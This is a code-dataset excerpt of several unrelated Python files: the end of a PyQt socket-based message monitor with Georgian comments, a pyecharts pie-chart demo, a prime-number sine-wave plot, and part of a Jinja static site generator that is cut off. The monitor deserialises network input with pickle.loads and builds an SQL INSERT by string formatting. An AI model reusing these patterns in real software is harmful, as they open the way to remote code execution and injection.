შევამოწმოთ რა დრო გავიდა Hello პაკეტის გაგზავნის შემდეგ\n if (datetime.datetime.now() - sent_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay * 2):\n self.connection_state = DISCONNECTED\n logger.warning(\"სერვერთან კავშირი გაწყდა\")\n self.register_to_ies_monitoring_server()\n return\n\n # ციკლის სტაბილური მუშაობისთვის\n time.sleep(delay)\n\n def response_ies_monitoring_server(self, message, addr):\n \"\"\"\n ფუნქცია განას���ვავებს ies_monitoring_server -ისგან მიღებულ შეტყობინებებს\n 1. თუ მოსულია registration_verified შეტყობინება მაშინ ies_monitoring_server -თან კავშირის სტატუსი ხდება \"CONNECTED\" და\n ეშვება testing_connection_to_ies_monitoring_server თრედი\n 2. თუ მოსულია database_updated შეტყობინება ეს ნიშნავს, რომ ies_monitoring_server -ის მონაცემთა ბაზაში\n დაემატა ახალი შეტყობინება და შესაბამისად უნდა მოხდეს მონაცემების ხელახალი წამოღება\n 3. თუ მოსულია hello პაკეტი მაშინ ies_monitoring_server -თან კავშირის სტატუსი ხდება \"CONNECTED\"\n \"\"\"\n\n # შევამოწმოთ message dictionary-ის თუ აქვს message_category ინდექსი\n if \"message_category\" not in message:\n logger.warning(\"response_ies_monitoring_server ფუნქციას მიეწოდა message dictionary \\\n რომელსაც არ აქვს message_category key-ი\")\n return\n\n # შევამოწმოთ მესიჯის კატეგორია\n if message[\"message_category\"] == \"registration_verified\":\n logger.info(\"ies_monitor-ი წარმატებით დარეგისტრირდა ies_monitoring_server-ზე\")\n self.registration_verified = True\n self.connection_state = CONNECTED\n self.last_received_message_category = message[\"message_category\"]\n\n # ეშვება თრედი რომელიც მუდმივად ამოწმებს სერვერთან კავშირს\n threading.Thread(target=self.testing_connection_to_ies_monitoring_server).start()\n threading.Thread(target=self.send_database_pull_request_to_ies_monitoring_server).start()\n\n elif message[\"message_category\"] == \"database_updated\":\n logger.info(\"სერვერიდან მოვიდა შეტყობინება იმის შესახებ, რომ მის მონაცემთა ბაზაში დაემატა ახალი შეტყობინება\")\n\n self.load_messages_from_mysql()\n\n # ვიძახებთ connect_to_sqlite ფუნქციას\n self.connect_to_sqlite()\n\n # ვიძახებთ check_opened_messages ფუნქციას\n self.check_opened_messages()\n\n elif message[\"message_category\"] == \"hello\":\n self.connection_state = CONNECTED\n logger.debug(\"სერვერიდან მოვიდა hello შეტყობინება იმის დასტურად რომ სერვერი ხელმისაწვდომია\")\n\n elif message[\"message_category\"] == \"message_data\":\n # ვინახავთ ბოლოს მიღებული შეტყობინების კატეგორიას\n self.last_received_message_category = message[\"message_category\"]\n\n def server_message_handler_thread(self, connection, addr):\n \"\"\" ფუნქცია ამუშავებს მიღებულ შეტყობინებებს წასაკითხად და განასხვავებს გამომგზავნს \"\"\"\n\n receiving_message_time_duraction = datetime.datetime.now()\n\n while self.application_is_closing is False:\n\n # ციკლის შეჩერება 0.1 წამით\n time.sleep(delay)\n\n if (datetime.datetime.now() - receiving_message_time_duraction) > datetime.timedelta(seconds=waiting_message_timeout):\n # ლოგია ჩასამატებელი???\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n\n # ფუნქციიდან გამოსვლა\n return\n\n # select.select ფუნქცია აბრუნებს readers list-ში ისეთ socket-ებს რომელშიც მოსულია წასაკითხი ინფორმაცია\n # ბოლო პარამეტრად მითითებული გვაქვს 0 რადგან ფუნქცია არ დაელოდოს ისე��� სოკეტს რომელზეც შეიძლება წაკითხვა\n readers, _, _, = select.select([connection], [], [], 0)\n\n # შევამოწმოთ readers list-ი თუ არ არის ცარიელი, რაც ამ შემთხვევაში ნიშნავს იმას რომ connection\n # socket-ზე მოსულია წასაკითხი ინფორმაცია\n if readers:\n # ცვლადი სადაც ვინახავთ მესიჯის ჰედერს და თვითონ მესიჯს\n header_and_message = b''\n\n # ახალი მესიჯი\n new_message = True\n\n # მესიჯის მოსვლის დრო\n message_receive_time = datetime.datetime.now()\n\n # მუდმივი ციკლი მესიჯის წასაკითხათ\n while self.application_is_closing is False:\n # დაყოვნება\n time.sleep(delay)\n\n if (datetime.datetime.now() - message_receive_time) > datetime.timedelta(seconds=next_message_bytes_timeout):\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n\n # logger ის გამოძახება\n # logger.warning(\"{} გამოგზავნილი მესიჯი არ მოვიდა სრულად. გამოგზავნილი მესიჯის ბაიტების რაოდენობა: {}.\"\n # \"მიღებული მესიჯის ბაიტების რაოდენობა: {}.\"\n # \" მიღებული მესიჯის ნაწილი:\\n{}\"\n # .format(str(addr), message_length, received_message_length, header_and_message.decode(\"utf-8\")))\n\n # ფუნქციიდან გამოსვლა\n return\n\n readers, _, _, = select.select([connection], [], [], 0)\n\n # შევამოწმოთ readers list-ი თუ არ არის ცარიელი, რაც ამ შემთხვევაში ნიშნავს იმას რომ connection\n # socket-ზე მოსულია წასაკითხი ინფორმაცია\n if readers:\n # ახალი მესიჯი\n # new_message = True\n\n # წავიკითხოთ გამოგზავნილი მესიჯის ან მესიჯის ნაწილი\n message_bytes = connection.recv(buffer_size)\n\n # იმ შემთხვევაში თუ კავშირი გაწყდა message_bytes იქნება ცარიელი\n if not message_bytes:\n # კავშირის დახურვა\n self.connection_close(connection)\n\n # ფუნქციიდან გამოსვლა\n return\n\n # მესიჯის მიღების დრო\n message_receive_time = datetime.datetime.now()\n\n # თუ მესიჯის წაკითხვა დაიწყო\n if new_message is True:\n\n # მესიჯის სიგრძის/ჰედერის წაკითხვა.\n message_length = int(message_bytes[:HEADERSIZE])\n\n # მესიჯის ჰედერის წაკითხვის დასასრული\n new_message = False\n\n # მესიჯის შეგროვება\n header_and_message += message_bytes\n\n # დავთვალოთ წაკითხული მესიჯის სიგრძე ჰედერის გარეშე\n received_message_length = len(header_and_message) - HEADERSIZE\n\n # შევამოწმოთ თუ წავიკითხეთ მთლიანი მესიჯი\n if received_message_length == message_length:\n try:\n # მესიჯის აღდგენა, bytes-ს ტიპიდან dictionary ობი���ქტში გადაყვანა\n message = pickle.loads(header_and_message[HEADERSIZE:])\n except Exception as ex:\n # logger -ის გამოძახება\n logger.warning(\"მიღებული მესიჯის bytes-ს ტიპიდან dictionary ობიექტში გადაყვანისას დაფიქსირდა შეცდომა: \\n{}\".format(str(ex)))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # ციკლიდან გამოსვლა\n break\n elif received_message_length > message_length:\n try:\n # მესიჯის აღდგენა, bytes-ს ტიპიდან dictionary ობიექტში გადაყვანა\n message = pickle.loads(header_and_message[HEADERSIZE:])\n except Exception as ex:\n # logger -ის გამოძახება\n logger.warning(\"მოსული მესიჯის სიგრძემ გადააჭარბა ჰედერში მითითებულ მოსალოდნელ სიგრძეს\")\n\n # logger -ის გამოძახება\n logger.warning(\"მიღებული მესიჯის bytes-ს ტიპიდან dictionary ობიექტში გადაყვანისას დაფიქსირდა შეცდომა: \\n{}\"\n .format(str(ex)))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # logger -ის გამოძახება\n logger.warning(\"მოსული მესიჯის სიგრძემ გადააჭარბა ჰედერში მითითებულ მოსალოდნელ სიგრძეს. მესიჯი: \\n{}\".format(message))\n\n # კავშირის დახურვა\n self.connection_close(connection, addr)\n # ფუნქციიდან გამოსვლა\n return\n\n # შევამოწმოთ თუ message dictionary-ის არ აქვს who_am_i key-ი\n if \"who_am_i\" not in message:\n logger.warning(\"მოსულია ისეთი შეტყობინება რომელსაც არ აქვს who_am_i key-ი\")\n # თუ არ გვაქვს who_am_i key-ი ესეიგი მოსულია საეჭვო მესიჯი და ვხურავთ თრედს\n break\n\n # შევამოწმოთ თუ შეტყობინება მოსულია ies_monitor.py - სგან\n elif message[\"who_am_i\"] == \"ies_monitoring_server\":\n self.response_ies_monitoring_server(message, addr)\n break\n\n def listening_to_ies_monitoring_server(self):\n \"\"\" ფუნქცია ხსნის პორტს და იწყებს მოსმენას \"\"\"\n\n # ვუთითებთ სოკეტის პარამეტრებს\n self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # მოსმენის დაწყება\n self.listener_socket.bind((ies_monitor_ip, ies_monitor_port))\n\n # ვუთითებთ მაქსიმალურ კლიენტების რაოდენობას ვინც ელოდება კავშირის დამყარებაზე თანხმობას\n self.listener_socket.listen(10)\n\n logger.debug(\"ies_monitor-ი მზად არის შეტყობინების მისაღებად\")\n\n while self.application_is_closing is False:\n try:\n # თუ client-ი მზად არის კავშირის დასამყარებლად დავეთანხმოთ\n connection, addr = self.listener_socket.accept()\n\n # გამოაქვს დაკავშირებული კლიენტის მისამართი\n logger.debug(\"შეტყობინების გამოსაგზავნად დაგვიკავშირდა: \" + str(addr))\n\n # თითოეულ დაკავშირებულ client-ისთვის შევქმნათ და გავუშვათ\n # ცალკე thread-ი client_handler_thread ფუნქციის საშუალებით\n threading.Thread(target=self.server_message_handler_thread, args=(connection, addr)).start()\n except socket.error:\n break\n except Exception as ex:\n logger.error(\"შეცდომა listening_to_ies_monitoring_server Thread-ში:\\n\" + str(ex))\n break\n\n def dictionary_message_to_bytes(self, message):\n \"\"\" ფუნქციას dictionary ტიპის მესიჯი გადაყავს bytes ტიპში და თავში უმატებს header-ს \"\"\"\n\n # dictionary გადადის bytes ტიპში (serialization)\n message_bytes = pickle.dumps(message)\n\n # მესიჯის სიგრძე დათვლა\n message_length = len(message_bytes)\n\n # header-ი გადავიყვანოთ ბაიტებში და დავუმატოთ გადაყვანილი მესიჯი byte-ებში\n message_bytes = bytes(str(message_length).ljust(HEADERSIZE), 'utf-8') + message_bytes\n\n # ფუნქცია აბრუნებს მესიჯს გადაყვანილს ბაიტებში თავისი header-ით\n return message_bytes\n\n def send_registration_request_to_ies_monitoring_server(self, message):\n \"\"\" მიმდინარე ies_monitor-ის რეგისტრაცია ies_monitoring_server-ზე ხდება ip-ს და პორტის\n გაგზავნით. რეგისტრაციის მერე ies_monitoring_server-ი შეგვატყოვინებს ყველა ახალ\n შეტყობინებას \"\"\"\n\n connection = self.connect_ies_monitoring_server()\n\n # შევამოწმოთ სერვერთან კავშირი თუ დამყარდა\n if connection is False:\n logger.warning(\"რეგისტრაციის პაკეტის გასაგზავნად სერვერთან კავშირი ვერ დამყარდა\")\n return False\n\n logger.debug(\"სერვერთან კავშირი დამყარდა რეგისტრაციის პაკეტის გასაგზავნად\")\n\n # შეტყობინების გაგზავნა და ფუნქციის მნიშვნელობის დაბრუნება\n return self.send_message_to_ies_monitoring_server(message)\n\n def check_opened_messages(self):\n \"\"\" ვამოწმებთ წაკითხული შეტყობინებების ბაზას და ვუცვლით ფერს\n შესაბამის შეტყობინებას, პროგრამის გახსნისას \"\"\"\n\n self.select_message_id_sqlite()\n\n # ვამოწმებთ არის თუ არა შეტყობინების ID წაკითხული შეტყობინებების ბაზაში,\n # არსებობის შემთხვევაში შეტყობინებას ეცვლება ფონტი\n for row_index, row in enumerate(self.message_data):\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n if row['message_id'] in self.get_id:\n font = QtGui.QFont()\n font.setBold(False)\n self.message_table.item(row_index, col_index).setFont(font)\n\n def connect_to_sqlite(self):\n \"\"\" ფუნქცია უკავშირდება წაკითხული შეტყობინებების ბაზას (sqlite) \"\"\"\n\n # უკავშირდება არსებულ sqlite ბაზას\n self.conn = sqlite3.connect('ies_monitor.db')\n\n # მონაცემების ლისტად წამოღება\n self.conn.row_factory = lambda cursor, rows: rows[0]\n\n self.sqlite_cursor = self.conn.cursor()\n\n def select_message_id_sqlite(self):\n \"\"\" ვკითხულობთ შეტყობინების ID -ს წაკითხული შეტყობინებების ბაზიდან \"\"\"\n\n self.sqlite_cursor.execute(\"SELECT message_id FROM opened_messages\")\n self.get_id = self.sqlite_cursor.fetchall()\n\n def insert_to_sqlite(self):\n \"\"\" ვწერთ გახსნილი შეტყობინების ID -ს sqlite ბაზაში,\n შეტყობინების ID -ები არ იწერება ხელმეორედ \"\"\"\n\n self.select_message_id_sqlite()\n if self.load_message['message_id'] in self.get_id:\n pass\n else:\n self.sqlite_cursor.execute(\n \"\"\"INSERT INTO \"opened_messages\" (\"message_id\",\"status\")\n VALUES ('{}','{}')\"\"\".format(self.load_message['message_id'], 1)\n )\n self.conn.commit()\n\n # self.sqlite_cursor.close() # ???\n # self.conn.close()\n\n def connect_to_mysql(self):\n \"\"\" ფუნქცია უკავშირდება Mysql სერვერს\"\"\"\n\n try:\n self.mysql_connection = pymysql.connect(\n mysql_server_ip,\n mysql_server_user,\n mysql_user_pass,\n mysql_database_name,\n port=mysql_server_port\n )\n logger.info(\"მონაცემთა ბაზასთან კავშირი დამყარებულია\")\n self.cursor = self.mysql_connection.cursor(pymysql.cursors.DictCursor)\n except Exception as ex:\n logger.warning(\"მონაცემთა ბაზასთან კავშირი წარუმატებელია\\n\" + str(ex))\n return False\n return self.cursor\n\n def set_qtablewidget_style(self):\n \"\"\" ფუნქცია აყენებს QTableWidgets -ის დიზაინის პარამეტრებს \"\"\"\n\n # self.message_table.setStyleSheet(\"QTableView {selection-background-color: #D98605;}\")\n # self.message_table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n # self.message_table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)\n\n # სვეტების რაოდენობა\n self.message_table.setColumnCount(len(self.mysql_table_col_names))\n\n # ვანიჭებთ სვეტებს შესაბამის სახელებს\n self.message_table.setHorizontalHeaderLabels(self.mysql_table_col_readable_names)\n self.message_table.setColumnHidden(4, True)\n self.message_table.setColumnHidden(0, True)\n # self.message_table.horizontalHeader().setStretchLastSection(True)\n self.message_table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n self.message_table.horizontalHeader().setSectionsMovable(True)\n\n def load_messages_from_mysql(self):\n \"\"\" mysql ბაზიდან კითხულობს შეტყობინებებს და სვავს message_table -ის შესაბამის სტრიქონში \"\"\"\n\n query = \"SELECT \" + \", \".join(self.mysql_table_col_names) + \" FROM messages\"\n self.cursor.execute(query)\n self.message_data = self.cursor.fetchall()\n self.mysql_connection.commit()\n self.message_table.setRowCount(0)\n for row_index, row in enumerate(self.message_data):\n self.message_table.insertRow(row_index)\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n self.message_table.setItem(row_index, col_index,\n QtWidgets.QTableWidgetItem(str(row[col_name])))\n\n def message_table_double_click(self):\n \"\"\"\n ფუნქცია გამოიძახება სტრიქონზე მაუსის ორჯერ დაჭერისას.\n იძახებს dialog ფანჯარას და ავსებს მონიშნული შეტყობინების მონაცემებით,\n მონიშნული შეტყობინების ID -ს წერს წაკითხული შეტყობინებების ბაზაში (sqlite),\n უცვლის წაკითხულ შეტყობინებას ფერს.\n \"\"\"\n\n dialog = QtWidgets.QDialog()\n self.ui = Ui_Dialog()\n self.ui.setupUi(dialog)\n selected_row_index = []\n for idx in self.message_table.selectedIndexes():\n selected_row_index.append(idx.row())\n\n for row_index, row in enumerate(self.message_data):\n if row_index == selected_row_index[0]:\n self.load_message = row\n\n self.load_message_data()\n\n self.connect_to_sqlite()\n\n self.insert_to_sqlite()\n\n self.select_message_id_sqlite()\n\n font = QtGui.QFont()\n font.setBold(False)\n if self.load_message['message_id'] in self.get_id:\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n self.message_table.item(selected_row_index[0], col_index).setFont(font)\n\n dialog.show()\n dialog.exec_()\n\n def load_message_data(self):\n \"\"\" ფუნქცია ავსებს dialog ფანჯარას შეტყობინების მონაცემებით \"\"\"\n\n self.ui.message_title.setText(self.load_message['message_title'])\n self.ui.message_id.setText(self.load_message['message_id'])\n self.ui.message_type.setText(self.load_message['message_type'])\n self.ui.client_ip.setText(self.load_message['client_ip'])\n self.ui.message_time.setText(str(self.load_message['sent_message_datetime']))\n self.ui.script_name.setText(self.load_message['client_script_name'])\n self.ui.text.setPlainText(self.load_message['text'])\n\n def closeEvent(self, event):\n \"\"\" ფუნქცია გამოიძახება პროგრამის დახურვის დროს \"\"\"\n\n close = QtWidgets.QMessageBox.question(\n self,\n \"QUIT\",\n \"Sure?\",\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No\n )\n\n if close == QtWidgets.QMessageBox.Yes:\n self.application_is_closing = True\n self.connection_close(self.listener_socket)\n event.accept()\n else:\n event.ignore()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n os._exit(app.exec_()) # ???!!!!!!!!!!!\n","sub_path":"ies_monitor.py","file_name":"ies_monitor.py","file_ext":"py","file_size_in_byte":54588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293934802","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Pie\nfrom pyecharts.faker import Faker\n\nc = (\n Pie()\n .add(\n \"\",\n [\n list(z)\n for z in zip(\n Faker.choose() + Faker.choose() + Faker.choose(),\n Faker.values() + Faker.values() + Faker.values(),\n )\n ],\n center=[\"40%\", \"50%\"],\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Pie-Legend 滚动\"),\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"80%\", orient=\"vertical\"),\n )\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {c}\"))\n .render(\"pie_scroll_legend.html\")\n)\n","sub_path":"Pie/pie_scroll_legend.py","file_name":"pie_scroll_legend.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130847247","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, print_function\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef avg_wave_of_freqs(freqs, x_cnt=0, x_max=0):\n if (x_cnt == 0):\n x_cnt = len(freqs)*2\n if(x_max == 0):\n x_max = freqs[-1]*50\n\n x = np.linspace(0, x_max, x_cnt)\n\n freqs_cnt = len(freqs)\n avg_of_waves = sum(map(lambda freq: np.sin(x/freq), freqs))\n return x, avg_of_waves/freqs_cnt\n\n\ndef plt_wave(x, avg_wave, wave_cnt):\n plt.plot(x, avg_wave)\n plt.xlabel('x')\n plt.ylabel('Avg of {} waves'.format(wave_cnt))\n plt.axis('tight')\n\n\ndef plt_avg(freqs, x_cnt=0, x_max=0):\n # Inverse\n freqs = np.array(freqs)\n x_cnt = 10000\n x_max = 100\n freqs = 1 / freqs\n x, avg_of_waves = avg_wave_of_freqs(freqs, x_cnt=x_cnt, x_max=x_max)\n plt_wave(x, avg_of_waves, len(freqs))\n\n\ndef main():\n pn_fname = os.path.join(os.path.dirname(__file__), 'prime-numbers.txt')\n with open(pn_fname, 'r') as f:\n pns = np.array(list(map(int, f.readlines())))\n # pns = pns[:5000]\n print('Using {} prime numbers (Largest: {})'.format(len(pns), pns[-1]))\n sys.stdout.flush()\n\n # plt.subplot(2, 2, 1)\n plt.title('Prime numbers')\n plt_avg(pns, x_cnt=20000, x_max=pns[-1]*40)\n\n # plt.subplot(2, 2, 2)\n # plt.title('Natural numbers')\n # plt_avg(list(range(2, pns[-1])), x_cnt=20000, x_max=pns[-1]*40)\n\n # non_pns = list(filter(lambda k: k not in pns, range(\n # 1, pns[-1])))\n # plt.subplot(2, 2, 3)\n # plt.title('non-primes')\n # plt_avg(non_pns, x_cnt=20000, x_max=pns[-1]*40)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"post/study/math/prime-number/prime_wave_simple.py","file_name":"prime_wave_simple.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"648482881","text":"#!/usr/bin/env python3\n# Requires the following pip packages:\n# python-dateutil, jinja2\n\nimport json, os, subprocess, jsonpickle\nimport re\n\nimport dateutil.parser, jinja2, joblib, PIL.Image, pygments\nimport xml.etree.ElementTree as ElementTree\nimport jinja2.ext\nfrom jinja2 import Environment, PackageLoader, ChoiceLoader, FileSystemLoader, StrictUndefined\nfrom jinja2.utils import Namespace\nfrom urllib.parse import urlsplit\nfrom pygments.lexers import guess_lexer, get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\n\n\nCONFIG_PATH = \"../build/config.json\"\n# Directory in which Jinja2 templates are stored\nTEMPLATE_DIR=\"templates\"\n\nIMG_EXTENSIONS = \".gif\", \".jpg\", \".jpeg\", \".png\", \".svg\"\nVID_EXTENSIONS = \".webm\",\nSND_EXTENSIONS = \".ogg\",\n# Anything visual\nGFX_EXTENSIONS = IMG_EXTENSIONS + VID_EXTENSIONS\nFONT_EXTENSIONS = \".eot\", \".ttf\", \".woff\", \".woff2\"\nCSS_EXTENSIONS = \".css\",\n\n# Config file read from .json on disk\nconfig = json.loads(open(CONFIG_PATH, \"r\").read())\n\npersistent = joblib.Memory(cachedir=\"../build/joblib\", verbose=0)\n\ndef get_ext(path):\n \"\"\"Return the extension of a filename.\n Example:\n >>> get_ext(\"my/name/is/pinkie.pie\")\n \".pie\"\n \"\"\"\n return os.path.splitext(path)[1]\n\ndef highlight_code(code, filetype=None):\n if filetype:\n lexer = get_lexer_by_name(filetype)\n else:\n lexer = guess_lexer(code)\n return pygments.highlight(code, lexer, HtmlFormatter())\ndef get_highlight_css():\n \"\"\"Return the CSS needed to perform syntax highlighting\"\"\"\n return HtmlFormatter().get_style_defs('.highlight')\n\ndef filter_into_tag(value):\n \"\"\"Given some text, this returns a human-readable tag that closely\n corresponds to the text but is safe to use in a URL.\n Example:\n >>> filter_into_tag(\"Hello, This is Arnold\")\n \"hello-this-is-arnold\"\n \"\"\"\n valid = 'abcdefghijklmnopqrstuvwxyz0123456789'\n # Make lowercase and replace illegal chars with hyphens\n value = \"\".join([c if c in valid else '-' for c in value.lower()])\n # Squash pairs of hyphens\n while len(value) != len(value.replace(\"--\", \"-\")):\n value = value.replace(\"--\", \"-\")\n\n return value\n\ndef filter_friendly_date(date):\n \"\"\"Takes a datetime.datetime object, returns a friendly version of the date, e.g. 'Jan 22, 2015'\"\"\"\n return date.strftime(\"%b %d, %Y\")\n\ndef filter_detailed_date(date):\n \"\"\"Takes a datetime.datetime object, returns a detailed version of the date, e.g. 'Jan 22, 2015 at 8:09 PM PST'\"\"\"\n return date.strftime(\"%b %d, %Y at %I:%M %p PST\")\n\ndef filter_drop_null_values(dict):\n \"\"\"Returns a new dict that contains only the items for which bool(item.value) == True\n Example:\n >>> filter_drop_null_values(dict(x=2, y=None, z=\"\", k=\"yes\", j=\"False\"))\n dict(x=2, k=\"yes\", j=\"False\")\n \"\"\"\n\n filt = {}\n for k, v in dict.items():\n if v:\n filt[k] = v\n return filt\n\ndef filter_url_with_args(path, **kwargs):\n \"\"\"Returns `path` + \"?\" + urlencode(kwargs),\n or just `path` if there are no kwargs\n \"\"\"\n urlargs = \"?\" + jinja2.filters.do_urlencode(kwargs) if kwargs else \"\"\n return path + urlargs\n\n@persistent.cache\ndef filter_tex_to_svg(tex):\n \"\"\"Convert LaTeX into an inline svg.\n e.g. \"e=mc^2\"|tex\n \"\"\"\n # Note: we prepend a space to fix bug in tex2svg when input is a number or starts with '-'\n tex = subprocess.Popen([\"tex2svg\", \"--inline\", \" \" + tex], stdout=subprocess.PIPE)\n res = subprocess.check_output([\"scour\", \"-q\", \"-p\" \"10\",\n \"--strip-xml-prolog\",\n \"--enable-comment-stripping\",\n \"--enable-id-stripping\",\n \"--create-groups\",\n ], stdin=tex.stdout)\n res = res.decode().strip()\n if not \"\" %self.src_filename\n \n @property\n def intermediate_path(self):\n # TODO: this should be passed via CLI\n return self.src_filename \\\n .replace(\".html.jinja.html\", \".html\") \\\n .replace(\".css.jinja.css\", \".css\") \\\n .replace(\".src.bin\", \"\")\n\n @property\n def intermediate_dir(self):\n return os.path.dirname(self.intermediate_path)\n\n @property\n def build_path(self):\n return self.intermediate_path \\\n .replace(config[\"build\"][\"intermediate\"], config[\"build\"][\"output\"])\n\n @property\n def base_src_info(self):\n \"\"\" Return the src_info common to all pages,\n sometimes unpopulated. \"\"\"\n # If there's info associated with the source, provide that, too.\n try:\n src_srcinfo = jsonpickle.decode(open(self.src_srcinfo_file).read())\n except FileNotFoundError:\n src_srcinfo = {}\n\n return dict(\n intermediate_src_path = self.src_filename,\n intermediate_path = self.intermediate_path,\n build_path = self.build_path,\n rtdeps = set(),\n srcdeps = set(),\n **src_srcinfo,\n )\n @property\n def base_build_info(self):\n \"\"\" Return the build common to all pages\n \"\"\"\n return dict(\n intermediate_path = self.intermediate_path,\n build_path = self.build_path,\n anchors = set(),\n )\n\n def get_build(self):\n \"\"\" Default build rule for POD files \"\"\"\n build = self.base_build_info\n build['rtdeps'] = set()\n build['content'] = \\\n open(self.src_filename, 'rb').read()\n return build\n\nclass JinjaPage(Page):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def _get_jinja_env(self, do_render=False):\n global config\n\n src_info = Namespace(\n title = \"\",\n desc = \"\",\n comments = dict(),\n page_type = Page,\n anchors = set(),\n **self.base_src_info\n )\n\n def to_build_path(abs_path):\n # TODO: result should be an absolute/canonical path!\n return abs_path.replace(config['build']['intermediate'],\n config['build']['output'])\n def path_from_root(path):\n \"\"\" Treat `path' as a path relative to the intermediate root.\n \"\"\"\n return os.path.join(config['build']['intermediate'], path)\n def path_from_here(path):\n \"\"\" Treat `path' as a path relative to the current folder\n \"\"\"\n return os.path.join(self.intermediate_dir, path)\n\n def to_rel_path(abs_path):\n #build_root = config[\"build\"][\"output\"] + \"/\"\n #if abs_path.startswith(build_root):\n # abs_path = abs_path[len(build_root):]\n # Separate the anchor, if it was provided\n if \"#\" in abs_path:\n abs_path, anchor = abs_path.split(\"#\")\n else:\n anchor = \"\"\n # Remove any stem that is common to (abs_path, build_path).\n if abs_path.startswith(config['build']['output']):\n parts_out, parts_abs = src_info.build_path.split(\"/\"), abs_path.split(\"/\")\n else:\n parts_out, parts_abs = src_info.intermediate_path.split(\"/\"), abs_path.split(\"/\")\n while parts_out and parts_abs and parts_out[0] == parts_abs[0]:\n del parts_out[0]\n del parts_abs[0]\n \n # add necessary ../ parents\n prefix = \"../\"*(len(parts_out)-1)\n # Add the leaf\n base = os.path.join(prefix, \"/\".join(parts_abs))\n # Remove index.html from the path if configured to.\n if base.endswith(\"index.html\") and config[\"omit_index_from_url\"]:\n base = base[:-len(\"index.html\")]\n # Re-add the anchor, if there was one\n retstr = \"#\".join((base, anchor)) if anchor else base\n if retstr == \"\":\n # old web browsers misinterpret empty href. See http://stackoverflow.com/questions/5637969/is-an-empty-href-valid\n retstr = \"#\"\n return retstr\n\n def get_srcinfo(pg):\n nonlocal src_info\n basedir = os.path.dirname(self.src_filename)\n full_path = os.path.join(basedir, pg) + \".srcinfo\"\n src_info.srcdeps.add(full_path)\n if do_render:\n # load the page info\n info = jsonpickle.decode(open(full_path).read())\n return info\n\n def get_resource(pg):\n nonlocal src_info\n basedir = os.path.dirname(self.src_filename)\n full_path = os.path.join(basedir, pg) + \".build\"\n src_info.srcdeps.add(full_path)\n if do_render:\n # load the page info\n info = jsonpickle.decode(open(full_path).read())\n return info\n\n\n env = Environment(trim_blocks=True, lstrip_blocks=True, undefined=StrictUndefined,\n extensions=[jinja2.ext.do],\n loader=ChoiceLoader([\n PackageLoader(\"__main__\", TEMPLATE_DIR),\n FileSystemLoader(\"/\")\n ]))\n\n # Populate template global variables & filters\n env.globals.update(config)\n env.globals[\"do_render\"] = do_render\n env.globals[\"config\"] = config\n env.globals[\"get_srcinfo\"] = get_srcinfo\n # TODO: replace with get_resource\n env.globals[\"get_page\"] = get_resource\n env.globals[\"get_image\"] = get_srcinfo\n env.globals[\"get_audio\"] = get_srcinfo\n env.filters[\"into_tag\"] = filter_into_tag\n env.filters[\"friendly_date\"] = filter_friendly_date\n env.filters[\"highlight_code\"] = highlight_code\n env.filters[\"detailed_date\"] = filter_detailed_date\n env.filters[\"drop_null_values\"] = filter_drop_null_values\n env.filters[\"url_with_args\"] = filter_url_with_args\n env.filters[\"unique\"] = filter_unique\n env.filters[\"tex\"] = filter_tex_to_svg\n env.filters[\"to_rel_path\"] = to_rel_path\n env.filters[\"to_build_path\"] = to_build_path\n env.filters[\"path_from_root\"] = path_from_root\n env.filters[\"path_from_here\"] = path_from_here\n env.globals[\"get_highlight_css\"] = get_highlight_css\n # Expose these types for passing to the `page.set_type` macro\n env.globals[\"BlogEntry\"] = BlogEntry\n env.globals[\"HomePage\"] = HomePage\n env.globals[\"AboutPage\"] = AboutPage\n env.globals[\"Page\"] = Page\n env.globals['page_info'] = src_info\n\n return env, src_info._Namespace__attrs\n\n def get_rendered_jinja(self, do_render):\n env, jinja_info = self._get_jinja_env(do_render=do_render)\n\n template = env.get_template(self.src_filename)\n rendered = template.render().strip()\n # Don't rely on self!\n jinja_info['srcdeps'].discard(self.intermediate_path)\n jinja_info['rtdeps'].discard(self.intermediate_path)\n jinja_info['rtdeps'].discard(self.build_path)\n \n return jinja_info, rendered\n\n\n def get_build(self):\n \"\"\" Render a .jinja.html page to html. \"\"\"\n jinja_info, rendered = self.get_rendered_jinja(do_render=True)\n\n build = self.base_build_info\n build['content'] = rendered\n build['rtdeps'] = jinja_info['rtdeps']\n build['anchors'] = jinja_info['anchors']\n\n return build\n\n def get_src_info(self):\n src_info, _rendered = self.get_rendered_jinja(do_render=False)\n return src_info\n\n\n\nclass Image(Page):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n @property\n def size(self):\n \"\"\"Returns the size of the image in pixels (width, height)\"\"\"\n if get_ext(self.intermediate_path) == \".svg\":\n 